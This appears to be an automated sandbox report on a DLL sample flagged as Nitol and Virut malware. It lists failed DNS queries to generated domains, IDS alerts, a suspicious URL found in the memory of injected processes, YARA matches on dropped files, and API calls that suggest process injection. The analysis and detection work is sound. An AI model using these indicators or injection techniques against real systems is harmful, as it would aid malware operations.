Source: unknown	DNS traffic detected: query: ltqjua.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ogvgft.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: dahwgm.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cwkzpg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: nvaijl.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: zuetyk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tfagrq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eiqljd.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: eupkbf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ohkncb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: heyanh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: dduavk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: jsioue.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: agjmxb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ymehei.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ebuspk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: iqdacv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: unskbm.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: rmqiuq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: kgvozz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: faweja.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gkbtuu.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: yovyrw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: iemjen.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: zkfevd.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: uxohei.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qlclyn.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ikfdit.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: thjvoi.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: msbfih.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: epgrzo.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vlscru.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: uahnrk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vxpesz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: hipfhf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: sjjile.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: jovlax.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: upnevr.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: yfpqxt.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: uzboio.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: bvvknd.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: uqfnkt.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fncqle.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: xunnfu.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: jeuiac.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: zuotaq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: apqqgj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: yoguud.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: wisllh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: itmffg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: edtlux.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ctpiwy.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fopopy.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: faxkac.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lanoyi.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: aubtoq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: aegjss.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gizyod.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: iezcob.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qfstid.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: rqmoov.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: glsmii.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: yeaedh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: zjfiqo.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: naxdur.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ulodoa.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gabamf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lityoa.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: rraenf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qtvtoh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fidiow.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: uafdxu.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: oseynl.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mbixoj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ootumr.com replaycode: Name error (3)

Source: Network traffic	Suricata IDS: 2811577 - Severity 1 - ETPRO MALWARE Possible Virut DGA NXDOMAIN Responses (com) : 1.1.1.1:53 -> 192.168.2.9:59736
Source: Network traffic	Suricata IDS: 2811577 - Severity 1 - ETPRO MALWARE Possible Virut DGA NXDOMAIN Responses (com) : 1.1.1.1:53 -> 192.168.2.9:50215
Source: Network traffic	Suricata IDS: 2811577 - Severity 1 - ETPRO MALWARE Possible Virut DGA NXDOMAIN Responses (com) : 1.1.1.1:53 -> 192.168.2.9:51823

Source: lsass.exe, 00000009.00000002.2760713212.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS%3C/ds:KeyName%3E%3C/ds:KeyInfo%3E%3CCipherData%3E%3CCipherValue%3EM.C506_SN1
Source: Microsoft-Windows-LiveId%4Operational.evtx.25.dr	String found in binary or memory: http://Passport.NET/tb
Source: lsass.exe, 00000009.00000000.1493523293.000002A29123E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digic
Source: lsass.exe, 00000009.00000002.2778726488.000002A291374000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2779510912.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1664829310.000002A2912FE000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1493737347.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1933474324.000002A29134C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1493684808.000002A291300000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000009.00000002.2779510912.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1493737347.000002A291385000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 00000009.00000002.2778726488.000002A291374000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1664829310.000002A2912FE000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1543267342.000002A2913EE000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1933474324.000002A29134C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: lsass.exe, 00000009.00000000.1493523293.000002A29123E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1493792866.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: lsass.exe, 00000009.00000000.1493523293.000002A29123E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiC8
Source: lsass.exe, 00000009.00000000.1493523293.000002A29123E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1493792866.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 00000009.00000002.2779510912.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1493737347.000002A291385000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000009.00000002.2778726488.000002A291374000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2779510912.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1664829310.000002A2912FE000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1493737347.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1933474324.000002A29134C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1493684808.000002A291300000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000009.00000002.2778726488.000002A291374000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1664829310.000002A2912FE000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1543267342.000002A2913EE000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1933474324.000002A29134C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: lsass.exe, 00000009.00000000.1493792866.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000009.00000000.1493684808.000002A291300000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000009.00000002.2778726488.000002A291374000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2779510912.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1664829310.000002A2912FE000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1493737347.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1933474324.000002A29134C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1493684808.000002A291300000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000009.00000000.1493523293.000002A29123E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1493792866.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000009.00000000.1492822482.000002A290A88000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2763076804.000002A290A88000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000009.00000000.1492859645.000002A290AC4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2764296436.000002A290AC4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000009.00000000.1492711290.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2759839699.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000009.00000002.2760713212.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1492737881.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000009.00000000.1492711290.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2759839699.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: lsass.exe, 00000009.00000002.2778726488.000002A291374000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1493523293.000002A29123E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2779510912.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1664829310.000002A2912FE000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1493737347.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1543267342.000002A2913EE000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1933474324.000002A29134C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1493684808.000002A291300000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000009.00000000.1493684808.000002A291300000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000009.00000000.1493792866.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: lsass.exe, 00000009.00000000.1492822482.000002A290A88000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1493684808.000002A291300000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: lsass.exe, 00000009.00000000.1492711290.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2759839699.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000009.00000000.1492711290.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2759839699.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: lsass.exe, 00000009.00000002.2760713212.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1492711290.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2759839699.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1492737881.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000009.00000000.1492711290.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2759839699.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000009.00000002.2759839699.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: lsass.exe, 00000009.00000000.1492711290.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2759839699.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
Source: hrl97BF.tmp, 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, hrl97BF.tmp, 00000006.00000002.2016979532.000000007FE10000.00000040.80000000.00040000.00000000.sdmp, hrl97AF.tmp, 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmp, hrl97AF.tmp, 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, hrl97AF.tmp, 00000007.00000002.2043860940.000000007FE10000.00000040.80000000.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.2742302542.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000000.1491863951.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000002.2741575463.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, lsass.exe, 00000009.00000002.2742148992.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, lsass.exe, 00000009.00000002.2743236363.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.2741589846.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.2742275015.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, svchost.exe, 0000000A.00000000.1493902232.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, fontdrvhost.exe, 0000000B.00000002.2741580715.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, fontdrvhost.exe, 0000000B.00000002.2798564614.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000002.2741587779.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000002.2798453376.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.2743314432.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000000D.00000002.2742234796.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000000E.00000002.2741590621.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000000E.00000002.2742653531.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.Brenz.pl/rc/
Source: lsass.exe, 00000009.00000000.1493792866.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: svchost.exe, 00000028.00000000.1574005525.000001A4D5EF7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.msftconnecttest.com
Source: svchost.exe, 00000028.00000000.1574005525.000001A4D5EF7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.msftconnecttest.com/
Source: svchost.exe, 0000000A.00000002.2790988057.000001A31C087000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.2791515071.000001A31C09B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000000.1495878213.000001A31C087000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.onenote.net/livetile/?Language=
Source: svchost.exe, 0000000A.00000002.2789825589.000001A31C054000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000000.1495785024.000001A31C054000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.cn/shellRESP
Source: svchost.exe, 0000000A.00000002.2789825589.000001A31C054000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000000.1495785024.000001A31C054000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com/shell

System Summary

Malicious sample detected (through community Yara rule)

Source: 26B1sczZ88.dll, type: SAMPLE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 26B1sczZ88.dll, type: SAMPLE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 3.2.rundll32.exe.10004090.1.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 30.0.hrlAF3E.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 30.0.hrlAF3E.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 20.2.rundll32.exe.10004090.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 20.2.rundll32.exe.10004090.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 21.2.hrlA367.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 21.2.hrlA367.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 34.0.zvhcfa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 34.0.zvhcfa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 7.2.hrl97AF.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.2.hrl97AF.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 20.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 20.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 30.2.hrlAF3E.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 30.2.hrlAF3E.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 0.2.loaddll32.exe.10004090.1.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 20.2.rundll32.exe.10004090.2.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 4.2.rundll32.exe.10004090.1.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 7.0.hrl97AF.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.0.hrl97AF.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 28.2.rundll32.exe.10004090.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 28.2.rundll32.exe.10004090.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 28.2.rundll32.exe.10004090.1.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 6.0.hrl97BF.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 6.0.hrl97BF.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 21.0.hrlA367.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 21.0.hrlA367.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 28.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 28.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 4.2.rundll32.exe.10004090.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 4.2.rundll32.exe.10004090.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 34.2.zvhcfa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 34.2.zvhcfa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 6.2.hrl97BF.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 6.2.hrl97BF.tmp.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 0.2.loaddll32.exe.10004090.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.2.loaddll32.exe.10004090.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 3.2.rundll32.exe.10004090.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 3.2.rundll32.exe.10004090.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\hrlBAE7.tmp, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\hrlBAE7.tmp, type: DROPPED	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp, type: DROPPED	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp, type: DROPPED	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp, type: DROPPED	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp, type: DROPPED	Matched rule: Detects Nitol Malware Author: Florian Roth
Source: C:\Windows\SysWOW64\zvhcfa.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Windows\SysWOW64\zvhcfa.exe, type: DROPPED	Matched rule: Detects Nitol Malware Author: Florian Roth

Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_0047846F lstrcpyW,lstrlenW,NtCreateSection,	6_2_0047846F
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_0047619E NtSetInformationProcess,	6_2_0047619E
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_004765B3 CloseHandle,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,CloseHandle,	6_2_004765B3
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_004763EE GetModuleHandleA,GetVersion,VirtualAlloc,CloseHandle,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,	6_2_004763EE
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_0047740B NtAdjustPrivilegesToken,	6_2_0047740B
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_00478438 NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory,	6_2_00478438
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_004784F0 NtOpenSection,	6_2_004784F0
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_00478535 NtMapViewOfSection,CloseHandle,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,	6_2_00478535
